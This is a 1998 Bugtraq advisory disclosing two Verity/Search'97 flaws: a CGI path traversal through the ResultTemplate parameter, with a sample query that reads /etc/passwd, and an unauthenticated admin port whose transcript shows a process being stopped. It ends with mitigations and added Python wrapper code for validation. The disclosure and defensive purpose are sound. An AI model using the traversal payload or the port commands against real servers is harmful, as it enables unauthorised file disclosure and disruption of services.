Verity/Search'97 Security Problems
daemon@ATHENA.MIT.EDU (Stefan Arentz)
Wed Jul 15 11:44:19 1998
Date: Tue, 14 Jul 1998 15:59:32 +0200
Reply-To: Stefan Arentz <stefan.arentz@SOZE.COM>
From: Stefan Arentz <stefan.arentz@SOZE.COM>
To: BUGTRAQ@NETSPACE.ORG
I've mentioned this a couple of weeks back to Verity tech support but
unfortunately nothing has happened since.
++ Intro
There are two major security holes in the Verity/Search'97 software.
The first one is a simple CGI hack that allows anybody with permission
to execute the s97_cgi CGI script to look at files on the webserver.
The second security problem is an authorization problem with the tasmgr
application.
++ CGI Scripts
The s97_cgi and s97r_cgi programs provide an interface for web based
applications to the Verity search engine. These two programs typically
handle search queries and showing the result of those queries.
One of the parameters to the script is one in which you specify the name
of a template file that is used to show the result of the search query.
This path is relative to a directory that you have to specify in the
Verity configuration files.
The problem is that this template pathname is appended to the base
directory name without proper checking of the path for .. or its
URL-encoded form %2e%2e. This means that it is possible to jump out of
the templates directory and use any file on the Verity host as a result
template. The file is sent back to the client browser in its original
form, or with minor modifications if it contained any valid HTMLscript
tags (Verity's script language).
Sample query:
http://www.xxx.com/search97.vts
?HLNavigate=On&querytext=dcm
&ServerKey=Primary
&ResultTemplate=../../../../../../../etc/passwd
&ResultStyle=simple
&ResultCount=20
&collection=books
Please note that only files can be read that are readable by the user
the webserver process runs as.
++ Tasmgr
The tasmgr process, part of the Agent Server, listens on port 1972 for
administrative commands. Unfortunately this requires no authorization
at all, so anybody who can reach the port can start and stop your agent
processes.
Connected to search97.xxx
Escape character is '^]'.
0 Verity dcm ready
list
0 TAS-Primary
status tas-primary
0 TYPE=PROCESS; STATE=RUNNING; STARTUP=AUTO_START; PID=87632
stop tas-primary
0 'tas-primary' signalled
status tas-primary
0 TYPE=PROCESS; STATE=STOPPING; STARTUP=AUTO_START; PID=87632
where
0 /home/verity/_hpux10/bin/dcm.cfg
None of this is mentioned in the manuals or online FAQs.
++ Possible solutions
For the CGI bug, use a wrapper around the Verity CGIs that checks
for .. (including its %2e%2e encoded form) in the argument part. This
can probably also be done with Apache's mod_rewrite. Another solution is
to directly call the Verity CGIs from your own CGI scripts. This is my
preferred way.
The TASMGR problem can simply be blocked with a firewall or router
ACL.
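As an added illustration of the wrapper check described above (this is example code written for this page, not Verity's code and not part of the original post), the Python below validates the ResultTemplate parameter before the real CGI is invoked. The template base directory is a hypothetical value; the real one comes from the site's Verity configuration files. The check decodes repeatedly so that %2e%2e and double-encoded forms are seen as the .. they are, normalises the path, and then confirms the result still lies inside the base directory rather than only grepping for the two dots. The sample query string and template name are constructed for the example.

```python
import posixpath
import urllib.parse

# Hypothetical base directory for result templates; the real value is set
# in the Verity configuration files (assumption for this example).
TEMPLATE_BASE = "/home/verity/templates"


def decode_fully(value, max_rounds=3):
    """Percent-decode until the value stops changing, so that %2e%2e and
    double-encoded forms such as %252e%252e collapse to a literal '..'."""
    for _ in range(max_rounds):
        decoded = urllib.parse.unquote(value)
        if decoded == value:
            return value
        value = decoded
    return value


def safe_template_path(template, base=TEMPLATE_BASE):
    """Return the absolute template path if it stays inside `base`, else None.

    Rejects empty names, NUL bytes, backslashes, absolute paths, the base
    directory itself, and any '..' that escapes upward after normalisation.
    """
    if not template:
        return None
    decoded = decode_fully(template)
    if "\x00" in decoded or "\\" in decoded:
        return None
    if decoded.startswith("/"):
        return None
    # normpath resolves interior '..' ("books/../x" -> "x"); anything that
    # still escapes the directory begins with a '..' segment afterwards.
    normalised = posixpath.normpath(decoded)
    if normalised == "." or normalised.split("/")[0] == "..":
        return None
    base = base.rstrip("/")
    full = posixpath.normpath(posixpath.join(base, normalised))
    # Containment check: the joined path must stay under base.
    if not full.startswith(base + "/"):
        return None
    return full


def check_query(query_string):
    """Validate the ResultTemplate parameter of a search97.vts query string.

    Returns (True, resolved_path) when the wrapper may pass the request on
    to the Verity CGI, or (False, reason) when it must be refused.
    """
    params = urllib.parse.parse_qs(query_string, keep_blank_values=True)
    values = params.get("ResultTemplate", [])
    if len(values) != 1:
        return False, "ResultTemplate missing or repeated"
    path = safe_template_path(values[0])
    if path is None:
        return False, "ResultTemplate escapes the template directory"
    return True, path


if __name__ == "__main__":
    # Constructed query strings: the traversal from the advisory and a benign one.
    attack = ("HLNavigate=On&querytext=dcm&ServerKey=Primary"
              "&ResultTemplate=../../../../../../../etc/passwd"
              "&ResultStyle=simple&ResultCount=20&collection=books")
    benign = "querytext=dcm&ResultTemplate=books.tmpl&collection=books"
    print(check_query(attack))   # (False, 'ResultTemplate escapes the template directory')
    print(check_query(benign))   # (True, '/home/verity/templates/books.tmpl')
```

A wrapper built this way calls the Verity CGI only after check_query returns True, and passes the resolved path rather than the raw parameter, so the CGI never sees an unchecked template name.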
Greetings,
Stefan
--
Stefan Arentz
stefan.arentz@soze.com / http://www.soze.com/stefan
Our future is so bright we've got to wear dark shades !